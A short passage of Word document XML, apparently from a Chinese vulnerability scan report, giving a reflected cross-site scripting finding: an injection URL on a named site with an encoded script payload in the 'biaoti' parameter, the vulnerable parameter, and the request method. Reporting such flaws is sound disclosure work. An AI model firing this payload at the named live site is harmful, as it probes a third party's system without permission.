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注入网址:http://tctkyb.cn/htm/lxwm.asp?biaoti=%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:biaoti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>请求方式:POST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http://tctkyb.cn/htm/lxwm.asp?biaoti=%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E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